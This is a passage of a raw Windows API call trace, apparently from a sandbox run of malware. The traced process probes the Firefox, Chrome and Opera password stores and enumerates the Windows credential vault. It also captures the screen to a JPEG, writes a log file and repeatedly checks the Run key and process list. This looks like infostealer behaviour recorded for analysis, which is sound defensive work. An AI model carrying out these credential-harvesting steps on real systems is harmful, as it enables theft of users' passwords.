DesiredAccess=0x120089, ObjectAttributes=0xde4ec*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Mozilla Firefox\\Firefox.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde50c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde524*=0x0, IoStatusBlock=0xde50c*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0239.000] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x7319c8) returned 1 [0239.001] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x7388d0) returned 1 [0239.005] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="LOCALAPPDATA", Value=0xde5e8 | out: Value="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0239.005] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", NtPathName=0xde5bc, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0239.005] NtCreateFile (in: FileHandle=0xde5dc, DesiredAccess=0x120089, ObjectAttributes=0xde5a4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde5c4, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde5dc*=0x0, IoStatusBlock=0xde5c4*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0239.006] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x71f3c8) returned 1 [0239.006] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0xde538 | out: Value="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0239.006] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data", NtPathName=0xde51c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0239.006] NtCreateFile (in: FileHandle=0xde53c, DesiredAccess=0x120089, ObjectAttributes=0xde504*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde524, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde53c*=0x0, IoStatusBlock=0xde524*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0239.007] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x71f3c8) returned 1 [0239.009] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="vaultcli.dll", BaseAddress=0xde760 | out: BaseAddress=0xde760*=0x6cc80000) returned 0x0 [0239.107] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtPathName=0xde630, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0239.129] NtCreateFile (in: FileHandle=0xde650, DesiredAccess=0x120089, ObjectAttributes=0xde618*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde638, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde650*=0x0, IoStatusBlock=0xde638*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc0000034 [0239.130] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x733dd0) returned 1 [0239.130] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtPathName=0xde648, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0239.130] NtCreateFile (in: FileHandle=0xde668, DesiredAccess=0x12019f, ObjectAttributes=0xde630*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde650, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x3, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde668*=0x264, IoStatusBlock=0xde650*(Status=0x0, Pointer=0x0, Information=0x2)) returned 0x0 [0239.133] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x733000) returned 1 [0239.133] NtQueryInformationFile (in: FileHandle=0x264, IoStatusBlock=0xde650, FileInformation=0xde5a8, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xde650, FileInformation=0xde5a8) returned 0x0 [0239.133] NtWriteFile (in: FileHandle=0x264, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, IoStatusBlock=0xde650, Buffer=0x705c78*, Length=0x28, ByteOffset=0xde5c0*=0, Key=0x0 | out: IoStatusBlock=0xde650, Buffer=0x705c78*) returned 0x0 [0239.135] NtClose (Handle=0x264) returned 0x0 [0239.136] VaultEnumerateVaults () returned 0x0 [0239.144] VaultOpenVault () returned 0x0 [0239.146] VaultEnumerateItems () returned 0x0 [0239.146] VaultFree () returned 0x0 [0239.147] VaultCloseVault () returned 0x0 [0239.147] VaultOpenVault () returned 0x0 [0239.148] VaultEnumerateItems () returned 0x0 [0239.158] VaultFree () returned 0x0 [0239.158] VaultCloseVault () returned 0x0 [0239.159] VaultFree () returned 0x1 [0239.163] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="gdiplus.dll", BaseAddress=0xde61c | out: BaseAddress=0xde61c*=0x6c960000) returned 0x0 [0240.177] GetDC (hWnd=0x0) returned 0x10107f0 [0240.177] CreateCompatibleDC (hdc=0x10107f0) returned 0x510109f9 [0240.177] GetSystemMetrics (nIndex=0) returned 1440 [0240.178] GetSystemMetrics (nIndex=1) returned 900 [0240.178] CreateCompatibleBitmap (hdc=0x10107f0, cx=1440, cy=900) returned 0xffffffff980509a6 [0240.420] SelectObject (hdc=0x510109f9, h=0x980509a6) returned 0x185000f [0240.420] BitBlt (hdc=0x510109f9, x=0, y=0, cx=1440, cy=900, hdcSrc=0x10107f0, x1=0, y1=0, rop=0xcc0020) returned 1 [0241.403] GdiplusStartup (in: token=0xde9f0, input=0xde9bc, output=0x0 | out: token=0xde9f0, output=0x0) returned 0x0 [0241.505] GdipCreateBitmapFromHBITMAP (hbm=0x980509a6, hpal=0x0, bitmap=0xde9ec) returned 0x0 [0241.723] GdipGetImageEncodersSize (numEncoders=0xde688, size=0xde684) returned 0x0 [0241.724] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x410) returned 0x71f828 [0241.724] GdipGetImageEncoders (in: numEncoders=0x5, size=0x410, encoders=0x71f828 | out: encoders=0x71f828) returned 0x0 [0241.725] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x71f828) returned 1 [0241.725] GdipSaveImageToFile (image=0x73a1f08, filename="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", clsidEncoder=0xde9ac*(Data1=0x557cf401, Data2=0x1a04, Data3=0x11d3, Data4=([0]=0x9a, [1]=0x73, [2]=0x0, [3]=0x0, [4]=0xf8, [5]=0x1e, [6]=0xf3, [7]=0x2e)), encoderParams=0x0) returned 0x0 [0242.269] GdiplusShutdown (token=0x1c6fc70) [0242.397] DeleteObject (ho=0x980509a6) returned 1 [0242.397] DeleteObject (ho=0x510109f9) returned 1 [0242.398] ReleaseDC (hWnd=0x0, hDC=0x10107f0) returned 1 [0242.439] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x270) returned 0x0 [0242.439] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0242.439] NtClose (Handle=0x270) returned 0x0 [0242.439] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0242.439] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0242.440] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x731cd8) returned 1 [0242.440] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0242.440] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0242.440] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x731db8) returned 1 [0242.452] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0242.453] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0242.528] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0242.528] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0242.528] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0243.190] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0243.192] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0243.255] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x270) returned 0x0 [0243.261] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0243.261] NtClose (Handle=0x270) returned 0x0 [0243.261] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.261] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0243.261] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x731d48) returned 1 [0243.261] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0243.262] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0243.262] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x731cd8) returned 1 [0243.262] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0243.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0243.265] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0243.384] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0243.385] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0246.040] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0246.042] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0246.548] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x270) returned 0x0 [0246.552] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0246.552] NtClose (Handle=0x270) returned 0x0 [0246.663] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0246.677] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0246.680] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x731cd8) returned 1 [0246.680] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0246.680] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0246.681] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x731e28) returned 1 [0246.682] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0246.682] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0246.695] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0246.696] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0246.696] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0247.044] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.053] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0247.111] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x270) returned 0x0 [0247.116] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0247.116] NtClose (Handle=0x270) returned 0x0 [0247.116] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.117] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0247.117] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x7320c8) returned 1 [0247.117] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.117] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0247.117] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x7320c8) returned 1 [0247.117] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4f0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0247.118] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0xc0000004 [0247.121] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0247.121] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4f0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0247.121] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4f0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4f0000, ResultLength=0x0) returned 0x0 [0247.440] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4f0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0247.442] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0247.535] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x270) returned 0x0 [0247.537] NtEnumerateValueKey (in: KeyHandle=0x270, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0247.538] NtClose (Handle=0x270) returned 0x0 [0247.538] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.538] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0247.538] RtlFreeHeap (HeapHandle=0x6f0000, Flags=0x0, BaseAddress=0x731fe8) returned 1 [0247.538] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Lbxhx9hm\\1byd2dsxipq.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0247.538] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, 